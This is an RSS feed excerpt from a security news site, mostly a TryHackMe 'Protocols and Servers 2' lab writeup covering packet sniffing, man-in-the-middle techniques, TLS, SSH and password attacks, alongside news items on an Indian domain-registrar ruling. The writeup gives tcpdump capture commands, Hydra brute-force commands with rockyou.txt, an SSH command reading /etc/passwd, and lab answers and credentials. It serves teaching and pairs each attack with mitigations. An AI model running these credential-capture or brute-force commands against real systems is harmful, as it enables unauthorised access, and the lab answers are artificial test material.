News: Asahi fixes macOS boot bug, reasons to run Gentoo, Ubuntu reverts Rust-based copy command, Astral gets WINE port<br>
Questions and answers: Various tools for running admin commands<br>
Released last week: Slackel 9.0 "MATE", Mageia 10, Kali Linux 2026.2,....]]></content:encoded>
</item>
<item>
<title><![CDATA[Cyber Security News Bulletin Weekly – Mythos is Back, WhatsApp Username, Kali Linux 2026.2, +20 Stories]]></title>
<description><![CDATA[This week’s roundup covers a major AI security model redeployment, several critical RCE vulnerabilities across popular tools, a landmark WhatsApp privacy update, and the latest Kali Linux release. Anthropic Confirms Claude Mythos 5 Redeployment Anthropic’s most powerful AI cybersecurity model…
Re...]]></description>
<link>https://tsecurity.de/de/3646979/it-security-nachrichten/cyber-security-news-bulletin-weekly-mythos-is-back-whatsapp-username-kali-linux-20262-20-stories/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646979/it-security-nachrichten/cyber-security-news-bulletin-weekly-mythos-is-back-whatsapp-username-kali-linux-20262-20-stories/</guid>
<pubDate>Sun, 05 Jul 2026 18:38:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This week’s roundup covers a major AI security model redeployment, several critical RCE vulnerabilities across popular tools, a landmark WhatsApp privacy update, and the latest Kali Linux release. Anthropic Confirms Claude Mythos 5 Redeployment Anthropic’s most powerful AI cybersecurity model…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/cyber-security-news-bulletin-weekly-mythos-is-back-whatsapp-username-kali-linux-2026-2-20-stories/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/cyber-security-news-bulletin-weekly-mythos-is-back-whatsapp-username-kali-linux-2026-2-20-stories/">Cyber Security News Bulletin Weekly – Mythos is Back, WhatsApp Username, Kali Linux 2026.2, +20 Stories</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[GoDaddy Warns India's Crackdown on Fake Site Registrars Could Upend Internet Privacy Everywhere]]></title>
<description><![CDATA["The internet is filled with fakes," writes Gizmodo. "A court in India is setting out to address the problem by requiring more transparency from domain registrars to make it easier to crack down on fraud. And while the intentions might be good, Reuters is reporting that major American domain regi...]]></description>
<link>https://tsecurity.de/de/3646948/it-security-nachrichten/godaddy-warns-indias-crackdown-on-fake-site-registrars-could-upend-internet-privacy-everywhere/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646948/it-security-nachrichten/godaddy-warns-indias-crackdown-on-fake-site-registrars-could-upend-internet-privacy-everywhere/</guid>
<pubDate>Sun, 05 Jul 2026 17:58:38 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA["The internet is filled with fakes," writes Gizmodo. "A court in India is setting out to address the problem by requiring more transparency from domain registrars to make it easier to crack down on fraud. And while the intentions might be good, Reuters is reporting that major American domain registrar GoDaddy is sounding the warning bells that the court's decision could fundamentally reshape the internet well beyond India's borders." 


GoDaddy argues the move would even make the internet less safe, reports Reuters :

[Online fraud] is a key challenge for Prime Minister Narendra Modi's government, which last year received 2.4 million complaints of alleged cyber fraud amounting to $2.4 billion. Starting in 2019, lawsuits were brought by dozens of Indian and global firms — Amazon against fake shopping sites trading on its name and McDonald's complaining against bogus sites offering franchises. [More than 20 companies filed a complaint, the article notes, including Microsoft.] In December, an Indian court blocked more than 1,100 such websites. The New Delhi judge however went further, ordering sweeping new measures that tech experts say have rewritten rules of internet governance: Domain sellers should not offer buyers free privacy protection by default, the buyer's details should be released to anyone with a "legitimate interest" within 72 hours, and website addresses that are variations of protected brand names must be prohibited. 


U.S.-based GoDaddy has challenged the directives before a larger bench of judges at the Delhi High Court, according to a Reuters review of non-public filings. It says the ruling will affect legitimate businesses that have names similar to big brands. Stopping privacy-by-default features, GoDaddy said, will result in public disclosure of name, address, telephone and email of legitimate website owners, exposing them to "foreseeable privacy and security risks" such as stalking and harassment. 

As domain names operate globally, not locally, the order could force GoDaddy to regulate website addresses across the world, it said. On the court's order imposing a 72-hour deadline on companies to provide registration details to anyone with "legitimate interest", GoDaddy argues it has no wherewithal to assess who has legitimate interest or not. The "commercially destabilising" directives may force domain name companies to "exit India", said one of GoDaddy's appeal documents that ran into 5,121 pages... GoDaddy rivals, Arizona-based Namecheap and Netherlands-based Hosting Concepts, have also challenged the New Delhi ruling, court records show, although Reuters could not ascertain details of their appeals... 

GoDaddy argues that diluting the privacy feature will run contrary to India's data protection law and the European Union GDPR law which mandates a "privacy by default" approach. Farzaneh Badii, a New York-based researcher on internet governance, criticised the New Delhi ruling, noting that Europe redacted such details because publishing them had been abused by harassment and targeted phishing. "The people exposed will be journalists, activists, small business owners, and private individuals. The brand impersonators will not," she said... 

While the sweeping December directives were issued by a court, they followed government's submissions, documents showed... The judges will hear the appeals on July 16. 



GoDaddy manages 80 million domains and serves over 20 million users, the article points out, with
annual revenue over $5 billion.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=GoDaddy+Warns+India's+Crackdown+on+Fake+Site+Registrars+Could+Upend+Internet+Privacy+Everywhere%3A+https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F07%2F05%2F0526213%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F07%2F05%2F0526213%2Fgodaddy-warns-indias-crackdown-on-fake-site-registrars-could-upend-internet-privacy-everywhere%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://tech.slashdot.org/story/26/07/05/0526213/godaddy-warns-indias-crackdown-on-fake-site-registrars-could-upend-internet-privacy-everywhere?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cyber Security News Bulletin Weekly – Mythos is Back, WhatsApp Username, Kali Linux 2026.2, +20 Stories]]></title>
<description><![CDATA[This week’s roundup covers a major AI security model redeployment, several critical RCE vulnerabilities across popular tools, a landmark WhatsApp privacy update, and the latest Kali Linux release. Anthropic Confirms Claude Mythos 5 Redeployment Anthropic’s most powerful AI cybersecurity model Cla...]]></description>
<link>https://tsecurity.de/de/3646828/it-security-nachrichten/cyber-security-news-bulletin-weekly-mythos-is-back-whatsapp-username-kali-linux-20262-20-stories/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646828/it-security-nachrichten/cyber-security-news-bulletin-weekly-mythos-is-back-whatsapp-username-kali-linux-20262-20-stories/</guid>
<pubDate>Sun, 05 Jul 2026 16:23:00 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This week’s roundup covers a major AI security model redeployment, several critical RCE vulnerabilities across popular tools, a landmark WhatsApp privacy update, and the latest Kali Linux release. Anthropic Confirms Claude Mythos 5 Redeployment Anthropic’s most powerful AI cybersecurity model Claude Mythos 5 is being restored to vetted US critical infrastructure organizations after a government-led suspension […]</p>
<p>The post <a href="https://cybersecuritynews.com/cyber-security-news-bulletin-weekly/">Cyber Security News Bulletin Weekly – Mythos is Back, WhatsApp Username, Kali Linux 2026.2, +20 Stories</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Protocols and Servers 2 TryHackMe Writeup]]></title>
<description><![CDATA[Somewhere on a network right now, a username and password are crossing the wire in plain, readable text — and someone could be quietly reading them.No exploit. No zero-day. Just a protocol that was never built to keep a secret.That’s the uncomfortable little truth this room is built around. So le...]]></description>
<link>https://tsecurity.de/de/3646317/hacking/protocols-and-servers-2-tryhackme-writeup/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646317/hacking/protocols-and-servers-2-tryhackme-writeup/</guid>
<pubDate>Sun, 05 Jul 2026 08:39:11 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><em>Somewhere on a network right now, a username and password are crossing the wire in plain, readable text — and someone could be quietly reading them.</em></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/900/1*7OqFQcrh6OcgOZyqGjAyqw.png"></figure><p>No exploit. No zero-day. Just a protocol that was never built to keep a secret.</p><p>That’s the uncomfortable little truth this room is built around. So let’s pull it apart.</p><p>Most of the internet’s classic protocols were designed in a more trusting era. It was a time when the people sharing a network mostly knew each other, and “someone might be listening” wasn’t the default assumption.</p><p>Those protocols still run everywhere. And many of them still send your credentials across the wire in plain text.</p><p><strong>Protocols and Servers 2</strong> on TryHackMe is about exactly that gap, and what closes it. It walks through three foundational attacks against network protocols, then the defenses that neutralize each one:</p><ul><li>Sniffing — quietly reading traffic off the wire</li><li>Man-in-the-Middle (MITM) — sitting between two parties and tampering</li><li>Password attacks — guessing or cracking the credentials themselves</li></ul><p>This is a writeup of the whole room: the concepts in plain language, the commands that matter, and the task answers explained. If you’re working through it yourself, follow along.</p><blockquote>One idea ties the entire room together: cleartext protocols are insecure by design. Everything else is a consequence of that single fact.</blockquote><h3>Part 1 — Sniffing Attacks</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/911/1*mxa7u-z6cA7UEL5f8tjJQg.png"></figure><p>A <strong>sniffing attack</strong> is the simplest idea in the room: use a packet-capture tool to grab traffic as it crosses the network, then read it.</p><p>If a protocol talks in cleartext, anyone positioned to see that traffic can pull out private messages or login credentials. Nothing is encrypted before it leaves your machine.</p><pre>"Isn't everything encrypted now?"</pre><p>It’s tempting to think sniffing is a solved, retro problem now that TLS is everywhere. It isn’t. It stays dangerous wherever cleartext still lives:</p><ul><li><strong>Internal corporate networks</strong>, where machine-to-machine traffic is often left unencrypted</li><li><strong>Legacy systems </strong>like old mail servers, embedded devices, and industrial control systems</li><li><strong>Misconfigured services</strong> where TLS is available but not strictly enforced</li><li><strong>IoT devices</strong> that habitually use plain protocols</li><li><strong>Wireless networks</strong>, where anyone in range can listen</li><li>After a MITM attack that has successfully downgraded or stripped encryption</li></ul><blockquote>In real internal pentests and red-team work, sniffing is still one of the most reliable ways to harvest credentials and learn how systems actually talk to each other.</blockquote><h3>The tools</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*xBxcZK8PVBApVtltOosP4Q.jpeg"><figcaption>Wireshark</figcaption></figure><p>Capturing packets needs a network card and the right privileges (root on Linux, administrator on Windows). Here are the staples:</p><ul><li><strong>tcpdump</strong> — lightweight open-source CLI capture tool, preinstalled on most Linux systems.</li><li><strong>Wireshark</strong> — the GUI standard, with powerful filtering, protocol dissection, and visualization.</li><li><strong>tshark</strong> — Wireshark’s command-line sibling, great for scripting.</li></ul><blockquote>Worth knowing too: <strong>tcpflow</strong> (reassembles TCP streams), <strong>ngrep</strong> (pattern-matching in traffic), and <strong>NetworkMiner</strong> (extracts files from captures).</blockquote><blockquote>Specialized credential-grabbers exist, but tcpdump and Wireshark can do the job with a little effort.</blockquote><h3>Capturing POP3 credentials with tcpdump</h3><p>The classic demo: a user checks email over POP3 (port 110, cleartext).</p><p>With access to the traffic — via a wiretap, a switch’s port mirroring, ARP spoofing, a compromised host, or a successful MITM — you run this command:</p><pre>sudo tcpdump port 110 -A</pre><p>Breaking that down:</p><ul><li>sudo — packet capture needs root privileges.</li><li>port 110 — only keep traffic to or from the POP3 server.</li><li>-A — print packet contents as ASCII, so cleartext is human-readable.</li></ul><p>In the capture, the login arrives across two packets and reads straight out:</p><pre>… USER frank … PASS D2xc9CgD</pre><p>Username frank, password D2xc9CgD, handed over in plain sight.</p><blockquote>Wireshark gets you there even faster: type “pop” in the display filter, and only POP3 traffic remains, credentials included.</blockquote><h4>Handy tcpdump filters</h4><pre>+------------------------------------+-----------------------------------------------------------+<br>| Command                            | Purpose                                                   |<br>+------------------------------------+-----------------------------------------------------------+<br>| sudo tcpdump port 110 -A           | Capture traffic on port 110 (POP3) in readable ASCII      |<br>| sudo tcpdump host 10.20.30.148 -A  | Capture ASCII traffic to/from a specific host IP          |<br>| sudo tcpdump port 80 -A            | Capture HTTP traffic (credentials in POST data)           |<br>| sudo tcpdump port 21 -A            | Capture FTP traffic (cleartext credentials)               |<br>| sudo tcpdump -w capture.pcap       | Save raw network packets to a file for later analysis     |<br>| tcpdump -r capture.pcap -A         | Read and display a saved capture file in ASCII text       |<br>+------------------------------------+-----------------------------------------------------------+</pre><h4>Mitigation</h4><p>Any cleartext protocol is exposed. The only requirement for the attack is a vantage point between the two parties or on the same network segment.</p><p>The core fix is encryption. This means wrapping the protocol in TLS (like HTTP to HTTPS, FTP to FTPS, or POP3 to POP3S) and replacing Telnet with SSH.</p><p>Layered on top of that:</p><ul><li>Network segmentation to limit who can see whose traffic</li><li>Encrypted VLANs or tunnels for sensitive internal traffic</li><li>802.1X port-based authentication so unknown devices can’t connect</li><li>Zero-trust thinking: treat every network as hostile and encrypt everything</li><li>Monitoring for ARP spoofing and other redirection to catch sniffing in progress</li></ul><p>Question: How do you capture only Telnet traffic with tcpdump? Answer: Telnet runs on port 23, so you add “port 23”.</p><p>Question: What is the simplest Wireshark display filter for IMAP? Answer: “imap”.</p><h3>Part 2 — Man-in-the-Middle (MITM) Attacks</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/678/1*uImWCNSpEizR46XoZzoc7g.png"><figcaption>Man-in-the-Middle Attack</figcaption></figure><p>Sniffing is passive listening. A <strong>MITM attack</strong> is active.</p><p>The attacker slips between two parties (A and B) so that A thinks it’s talking to B, while everything actually flows through the attacker. They can read and completely alter the data.</p><p>The room’s example says it best: A asks to transfer $20, the attacker rewrites the amount mid-flight, and B acts on the tampered message.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*C0zge6WQ4_HZjbPjnt1i0g.png"><figcaption>Image 1 from the room</figcaption></figure><p>It works whenever the protocol doesn’t verify the authenticity and integrity of each message.</p><h4>Getting into the middle</h4><p>To sit between two parties, an attacker has to redirect traffic through their own machine. Common routes include:</p><ul><li><strong>ARP spoofing</strong> — on a local network, the attacker sends forged ARP messages tying their own MAC address to the gateway’s IP, routing traffic directly to them.</li><li><strong>DNS spoofing </strong>— feeding false DNS answers to send victims to attacker-controlled servers.</li><li><strong>Rogue access points </strong>— fake Wi-Fi setups (like “Airport_WiFi_Free”) that route every connected victim’s traffic through the attacker.</li><li><strong>BGP hijacking </strong>— announcing false routes at the internet’s routing layer to reroute traffic for whole organizations or regions.</li></ul><h4>The tooling</h4><ul><li><strong>Bettercap </strong>— the modern, actively maintained successor to Ettercap. Handles ARP/DNS spoofing, HTTP/HTTPS proxying, and is modular.</li><li><strong>Ettercap</strong> — the classic LAN MITM tool. It still works, but Bettercap is generally preferred today.</li><li><strong>mitmproxy </strong>— an interactive HTTPS proxy used for inspecting and modifying web traffic on the fly.</li><li><strong>Responder </strong>—<strong> </strong>Windows-focused<strong>.</strong> Abuses fallback name-resolution protocols (LLMNR, NBT-NS) that kick in when DNS fails, answering with its own IP to capture authentication hashes. A staple of internal Active Directory pentests.</li></ul><h4>MITM against encrypted traffic</h4><p>Encryption raises the bar, but it isn’t a magic shield:</p><ul><li><strong>SSL stripping</strong> — quietly downgrade the victim’s connection to plain HTTP while the attacker keeps an HTTPS link to the real server. This is easy to miss if the user never typed <em>“https://”</em> or didn’t check for the padlock icon.</li><li><strong>Fake certificates</strong> — present your own certificate and run two separate encrypted legs. This works if the victim blindly clicks through the browser warning or if a Certificate Authority is compromised.</li><li><strong>Compromised or rogue CAs </strong>— the most serious case. If an attacker controls a trusted CA, they can mint valid-looking certificates for absolutely any domain.</li></ul><h4>Modern defenses</h4><p>A decade of security hardening makes MITM much harder now:</p><ul><li><strong>HTTPS by default</strong> (browsers flag plain HTTP as “Not Secure”)</li><li><strong>HSTS</strong> (forces HTTPS and blocks stripping attacks)</li><li><strong>Certificate Transparency</strong> (public, auditable logs of all issued certificates)</li><li><strong>Certificate pinning</strong> (apps accept only specific, hardcoded keys)</li><li><strong>DANE</strong> (publishing certificate info in DNSSEC-signed DNS)</li></ul><p>MITM still succeeds when users ignore certificate warnings, apps validate keys poorly, the target speaks cleartext, or legacy gear lacks modern features.</p><p>The fundamental fix remains the same: cryptography. You need authentication plus encryption/signing, which is exactly what properly implemented TLS provides.</p><p><strong>Question 1:</strong> How many interfaces does Ettercap offer?</p><pre>Answer: 3</pre><p><strong>Question 2:</strong> How many ways can you invoke Bettercap?</p><pre>Answer: 3</pre><h3>Part 3 — TLS: The Fix for Both Attacks</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/622/1*3Qn-dR4Ps9kwTxZGqRBBHw.jpeg"></figure><p>Both sniffing and MITM share one cure: TLS (Transport Layer Security). This part of the room is the solution chapter.</p><h4>A quick history</h4><p>SSL appeared in 1994 via Netscape, with SSL 3.0 dropping in 1996 as the web grew into shopping and payments. TLS succeeded it in 1999.</p><p>Where things stand now:</p><ul><li>SSL 2.0 and 3.0 are deprecated and highly insecure. Never use them.</li><li>TLS 1.0 and 1.1 were officially deprecated in 2021 and dropped by major browsers.</li><li>TLS 1.2 (from 2008) is still widely used and secure when configured with modern ciphers.</li><li>TLS 1.3 (from 2018) is the current standard. It features fewer algorithms, a faster handshake, and forward secrecy by default.</li></ul><p>People still say “SSL certificate” out of habit, but in practice, everything modern uses TLS.</p><h4>Where TLS sits</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Q9wEkyyAKPn28lVN9bDX2Q.png"><figcaption>Image 2 from the room</figcaption></figure><p>Cleartext application-layer protocols send data entirely in the open.</p><p>TLS adds encryption just below the application protocol, wrapping its data before it hits the network card. On the OSI model, it lives right between the transport and application layers.</p><h4>Upgrading protocols with TLS</h4><ul><li>HTTP (Port 80) upgrades to HTTPS (Port 443)</li><li>FTP (Port 21) upgrades to FTPS (Port 990)</li><li>SMTP (Port 25) upgrades to SMTPS (Port 465)</li><li>POP3 (Port 110) upgrades to POP3S (Port 995)</li><li>IMAP (Port 143) upgrades to IMAPS (Port 993)</li></ul><p>It’s not just web and mail. DNS can be wrapped too via DoT (DNS over TLS) on port 853, or DoH (DNS over HTTPS) on port 443. Both stop eavesdroppers from seeing which sites you look up.</p><h4>Implicit TLS vs STARTTLS</h4><ul><li>Implicit TLS uses a dedicated port that is fully encrypted from the very first byte (like 443 or 993).</li><li>STARTTLS connects in cleartext on the normal port, then issues a “STARTTLS” command to upgrade the connection in place. This is common for email setup.</li></ul><blockquote>Both offer encryption, but implicit TLS is highly preferred.</blockquote><p>A MITM attacker can easily strip the STARTTLS command during negotiation and force the session to stay in cleartext if the client isn’t configured to require it.</p><h4>How HTTPS works</h4><p>Plain HTTP takes two steps: open a TCP connection, then send requests. HTTPS inserts a step in between:</p><ol><li>Establish a standard TCP connection.</li><li>Establish a TLS connection (the handshake).</li><li>Send the HTTP requests, which are now fully encrypted.</li></ol><p>A simplified TLS 1.2 handshake goes like this:</p><blockquote><strong>ClientHello</strong> (client offers its TLS versions and cipher suites) <strong>→</strong> <strong>ServerHello</strong> (server picks the parameters and sends its certificate) <strong>→ Key Exchange</strong> (both derive a shared secret)<strong> →</strong> <strong>Finished</strong> (both confirm and switch to encrypted communication):</blockquote><pre>ClientHello → ServerHello → Key Exchange → Finished</pre><h4>Certificates and trust</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/980/1*-10wNzrM0tEpRINoAqc5mQ.png"><figcaption>Certificate Authority (CA)</figcaption></figure><p>HTTPS leans on certificates signed by trusted Certificate Authorities (CAs). Your browser expects a valid certificate from a trusted CA, which proves you’re talking to the real server and blocks easy MITM attempts.</p><p>A certificate shows who it was issued to, who issued it, and its validity period. An expired certificate should never be trusted.</p><p>The modern ecosystem made this nearly universal thanks to automated platforms like <a href="https://letsencrypt.org/"><em>Let’s Encrypt</em></a>, which pushed global HTTPS traffic past 95%.</p><p><strong>Question:</strong> What is the three-letter acronym for the DNS protocol that uses TLS?</p><pre>Answer: DoT (DNS over TLS)</pre><h3>Part 4 — SSH: Secure Remote Administration</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/920/1*EidIDqyfQGBr2l3Y-KLmog.png"><figcaption>SSH</figcaption></figure><p>SSH (Secure Shell) is the secure replacement for Telnet. It is the universal way to administer servers, network gear, and cloud infrastructure.</p><p>The “S” means you can confirm the server’s identity, your messages are encrypted for the intended recipient only, and any data tampering is instantly detectable.</p><blockquote>It handles confidentiality and integrity seamlessly over port 22.</blockquote><h4>Authentication methods</h4><ul><li><strong>Password </strong>— The simplest method. The password rides the encrypted channel, but weak choices can still fall to brute-force attacks.</li><li><strong>Public key (recommended) </strong>— A private key stays on your machine, while the public key goes on the server. The server challenges you to prove you hold the private key without ever transmitting it.</li><li><strong>Certificate-based </strong>— An SSH CA signs user and host keys. This scales incredibly well because you don’t have to manually distribute public keys to every single server.</li><li><strong>MFA </strong>— Combines a traditional key or password with a one-time code for high-security environments.</li></ul><h4>Connecting</h4><ul><li>To connect, you run:</li></ul><pre>ssh mark@MACHINE_IP</pre><p>Enter the password or let your key authenticate, and you are on the remote terminal. Every single command you send runs over an encrypted channel.</p><p><strong>Question:</strong> Connect as mark (password XBtc49AB) and find the kernel release with uname -r.</p><pre>Commands: ssh mark@MACHINE_IP uname -r</pre><pre>Answer: 5.15.0–119-generic</pre><h4>Host key verification</h4><p>On your very first connection, SSH shows the server’s key fingerprint and asks if you want to continue.</p><p>Ideally, you verify this fingerprint through an admin or config management before typing “yes”. It is then saved in your local known_hosts file.</p><p>If that key ever changes unexpectedly in the future, SSH throws a massive warning, a major indicator of a potential MITM attack or a reinstalled server.</p><h4>Generating keys</h4><ul><li>To create a new key pair, run:</li></ul><pre>ssh-keygen -t ed25519 -C "your_email@example.com"</pre><p>The private key stays strictly on your machine and should be passphrase-protected. The public key (.pub) is safe to share. You can push it to a remote server easily using:</p><pre>ssh-copy-id mark@MACHINE_IP</pre><h4>Useful options</h4><pre>+--------------------------------------------+------------------------------------------------------------+<br>| Command                                    | Purpose                                                    |<br>+--------------------------------------------+------------------------------------------------------------+<br>| ssh -p 2222 mark@MACHINE_IP                | Connect to a remote server running on a non-standard port   |<br>| ssh -i ~/.ssh/custom_key mark@MACHINE_IP   | Specify a specific private key file to use for login       |<br>| ssh -J bastion.example.com mark@internal   | Jump through a secure bastion host to reach an internal IP |<br>| ssh -L 8080:localhost:80 mark@MACHINE_IP   | Set up a local port forward to tunnel traffic through SSH  |<br>| ssh -D 9050 mark@MACHINE_IP                | Create a dynamic SOCKS proxy forward for traffic routing   |<br>| ssh mark@MACHINE_IP "cat /etc/passwd"      | Run a single, one-off command without opening a full shell |<br>+--------------------------------------------+------------------------------------------------------------+</pre><h4>Secure file transfer</h4><ul><li><strong>SFTP</strong> — Interactive, FTP-like file management running completely over SSH. This is the recommended choice today.</li><li><strong>SCP </strong>— Simple file copies over SSH. This is now deprecated by OpenSSH in favor of SFTP, though it still works on most systems.</li><li><strong>rsync over SSH </strong>— The best option for large or repeated transfers because it only copies the specific parts of files that changed.</li></ul><p>To copy files via SCP:</p><pre>scp mark@MACHINE_IP:/home/mark/archive.tar.gz ~/ (remote to local)</pre><pre>scp backup.tar.bz2 mark@MACHINE_IP:/home/mark/ (local to remote)</pre><p><strong>Quick clarifier:</strong></p><blockquote>SFTP runs over SSH (port 22).</blockquote><blockquote>FTPS is FTP-over-TLS (port 990).</blockquote><p>They are entirely different protocols despite having similar names.</p><p><strong>Question:</strong> Download book.txt from the remote system; what download size did scp display in KB?</p><pre>Command: scp mark@MACHINE_IP:/home/mark/book.txt ~/</pre><pre>Answer: 415</pre><h4>Hardening SSH</h4><p>To protect a server, you can modify its config file <em>(/etc/ssh/sshd_config)</em>:</p><ul><li>Set PasswordAuthentication to “no” once public keys are established.</li><li>Set PermitRootLogin to “no” to force users to log in with regular accounts first.</li><li>Use AllowUsers or AllowGroups to create an explicit access whitelist.</li><li>Change the default port to reduce automated log noise.</li><li>Deploy fail2ban to automatically block IPs with repeated failed login attempts.</li></ul><h3>Part 5 — Password Attacks</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*6_lWVwmNlB93-2JkYWo8Og.png"></figure><p>Even with a network fully encrypted, authentication remains a primary target. Authentication is simply the act of proving your identity, like entering a password to access a service.</p><p>The three factors:</p><ul><li><strong>Something you know </strong>— a password or PIN</li><li><strong>Something you have </strong>— a phone, hardware security key, or smart card</li><li><strong>Something you are </strong>— a fingerprint or facial scan</li></ul><p>This section focuses entirely on attacking “something you know.”</p><h4>Why weak passwords persist</h4><p>Massive historic breaches show that old habits die hard.</p><p>The most common passwords found in modern breaches still include variations like 123456, password, qwerty, Password1, and seasonal choices like Summer2024.</p><p>Because people constantly reuse passwords across multiple sites, a single leak frequently gives attackers access to entirely unrelated corporate or personal accounts.</p><h4>Types of attacks</h4><ul><li><strong>Guessing </strong>— using personal info like a target’s pet, birth year, or favorite sports team harvested from social media.</li><li><strong>Dictionary</strong>— automatically trying lists of real words and common variations.</li><li><strong>Brute force </strong>— systematically trying every possible characters combination. This is exhaustive, which is why password length matters so much.</li><li><strong>Credential stuffing</strong> — taking leaked username/password pairs from old breaches and automatically testing them against other web services.</li><li><strong>Password spraying </strong>— testing one or two incredibly common passwords against a massive list of user accounts to dodge lockout policies.</li><li><strong>Hybrid</strong> — combining dictionary words with systematic patterns, like capitalizing the first letter and adding a year to the end.</li></ul><h4>Wordlists</h4><ul><li>The classic go-to wordlist is RockYou, located on the TryHackMe AttackBox at:</li></ul><pre>/usr/share/wordlists/rockyou.txt</pre><blockquote>Beyond that, security professionals use collections like SecLists, CrackStation lists, or custom-generated lists tailored specifically to the target’s language, region, or industry habits.</blockquote><h4>THC Hydra</h4><p>Hydra is a fast network login cracker that throws wordlists at live services like FTP, POP3, IMAP, SSH, and HTTP.</p><p>The basic syntax looks like this:</p><pre>hydra -l username -P wordlist.txt server service</pre><ul><li>-l specifies a single username (-L for a text file of names)</li><li>-P specifies a password wordlist (-p for a single password)</li><li>server is the target IP or hostname</li><li>service is the protocol you are targeting</li></ul><p>Examples:</p><pre>hydra -l mark -P /usr/share/wordlists/rockyou.txt MACHINE_IP ftp<br>hydra -l frank -P /usr/share/wordlists/rockyou.txt MACHINE_IP ssh<br>hydra -l lazie -P /usr/share/wordlists/rockyou.txt MACHINE_IP imap</pre><p>Handy options include -s to target a non-default port, -vV for detailed verbosity, -t to adjust parallel attack threads, and -f to immediately stop execution when the first valid password is found.</p><h4>Other tools</h4><p>Alternative online crackers include <strong>Medusa</strong> and <strong>Ncrack</strong>.</p><p>For Windows and Active Directory environments, tools like <strong>NetExec</strong> excel at spraying credentials over SMB and LDAP.</p><p>If you manage to dump password hashes from a database, offline tools like <strong>Hashcat</strong> or <strong>John the Ripper </strong>are used because they can guess millions of combinations per second without worrying about network lag or lockouts.</p><h4>Mitigation</h4><p>Defending against password attacks requires a modern approach to identity management:</p><ul><li>Enforce <strong>length-first password policies</strong> based on NIST guidelines. Favor overall length over complex character rotation, and check new passwords against lists of known compromised credentials.</li><li>Implement <strong>strict account lockout</strong> or <strong>throttling mechanisms</strong> to kill automated automated guessing, while remaining aware of password spraying patterns.</li><li>Use <strong>CAPTCHAs</strong> to prevent basic bot execution on login forms.</li><li>Deploy <strong>Multi-Factor Authentication (MFA)</strong> across all external endpoints.</li><li>Transition toward <strong>passwordless ecosystems</strong>, utilizing passkeys (FIDO2/WebAuthn), hardware keys, or verified magic links.</li></ul><p><strong>Question: </strong>One email account is lazie; what password accesses the IMAP service?</p><pre>Command: hydra -l lazie -P /usr/share/wordlists/rockyou.txt MACHINE_IP imap</pre><pre>Answer: butterfly</pre><h3>Key Takeaways</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*35eDunQG0NLCy_K2XVOvtA.jpeg"></figure><p>The fundamental rule of network security is simple:</p><blockquote>Cleartext protocols are inherently insecure.</blockquote><p>Anything sent without encryption can be effortlessly intercepted by sniffing or manipulated via a Man-in-the-Middle attack.</p><p>The security path forward is uniform across all services:</p><ul><li>Use HTTPS instead of HTTP</li><li>Use SSH instead of Telnet</li><li>Use SFTP or FTPS instead of basic FTP</li><li>Use IMAPS, POP3S, and SMTPS instead of their legacy cleartext variants</li></ul><p>Even when a connection is perfectly encrypted, weak passwords remain a glaring vulnerability.</p><p>Secure the protocol with robust encryption, then secure the account with long passwords, rate limiting, and multi-factor authentication.</p><h4>Quick Port Reference Guide</h4><pre>+-------------------+------+----------------+<br>| Protocol          | Port | Security       |<br>+-------------------+------+----------------+<br>| FTP               | 21   | Cleartext      |<br>| FTPS              | 990  | TLS (implicit) |<br>| HTTP              | 80   | Cleartext      |<br>| HTTPS             | 443  | TLS (implicit) |<br>| IMAP              | 143  | Cleartext      |<br>| IMAPS             | 993  | TLS (implicit) |<br>| POP3              | 110  | Cleartext      |<br>| POP3S             | 995  | TLS (implicit) |<br>| SMTP              | 25   | Cleartext      |<br>| SMTP submission   | 587  | STARTTLS       |<br>| SMTPS             | 465  | TLS (implicit) |<br>| SSH / SFTP        | 22   | Encrypted (SSH)|<br>| Telnet            | 23   | Cleartext      |<br>+-------------------+------+----------------+</pre><p><em>Room: Protocols and Servers 2 — TryHackMe (</em><a href="https://tryhackme.com/room/protocolsandservers2"><em>https://tryhackme.com/room/protocolsandservers2</em></a><em>). This writeup is for educational purposes; only test systems you’re authorized to. Have fun!</em></p><p><em>This article was written by Pop123 as a walkthrough for the TryHackMe lab. I am as always open to further discussing the topic.</em></p><img 